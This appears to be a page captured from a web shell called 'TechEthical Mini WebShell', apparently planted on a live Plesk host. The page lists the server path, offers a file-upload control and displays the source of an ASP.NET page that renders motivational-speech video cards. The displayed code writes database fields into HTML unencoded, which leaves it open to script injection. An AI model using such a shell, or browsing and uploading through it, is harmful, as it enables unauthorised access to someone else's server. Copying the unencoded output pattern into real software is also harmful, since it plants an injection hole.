TechEthical CEHP

Current Path : G:/PleskVhosts/megamind.net.in/careercentre360.com/
Upload File :
Current File : G:/PleskVhosts/megamind.net.in/careercentre360.com/Video-Motivational-Speeches.aspx

<%@ Page Title="Motivational Speeches" Language="C#" MasterPageFile="~/Main.Master" AutoEventWireup="true" CodeBehind="Video-Motivational-Speeches.aspx.cs" Inherits="Bathuasoft.Video_Motivational_Speeches" %>
<asp:Content ID="Content1" ContentPlaceHolderID="head" runat="server">
</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" runat="server">

    <div class="page-banner-area">
		   <img src="img/bg/bg3.jpg" height="100%" width="100%" />
		</div>

    <div class="row row-fluid pt-20 pb-20" style="text-align:center; background-color:white; padding-left:20px; padding-right:5px; ">
    
         <% for (var i = 0; i < ds.Tables[0].Rows.Count; i++)
        {
            Response.Write("<div class='col-md-3'>");
            Response.Write("<div class='card text-white bg-primary mb-3'>");
            Response.Write("<div class='card-header' style='min-height:85px;'> <b>" + ds.Tables[0].Rows[i]["title"].ToString() + " </b></div>");
            Response.Write("<div class='card-body'>");
            Response.Write(ds.Tables[0].Rows[i]["Path"].ToString());

            Response.Write("<h5 class='card-title'> <b>" + ds.Tables[0].Rows[i]["Course"].ToString() + "</b> </h5>");
                        
            Response.Write("<p class='card-text' style='min-height:120px;'> " + ds.Tables[0].Rows[i]["Description"].ToString() + "  </p>");
            Response.Write("</div>");
            Response.Write("</div>");               
            Response.Write("</div>");             
        }%>    
       
    </div>
</asp:Content>

TechEthical Mini WebShell Version 1.0, Coded By The_M@T3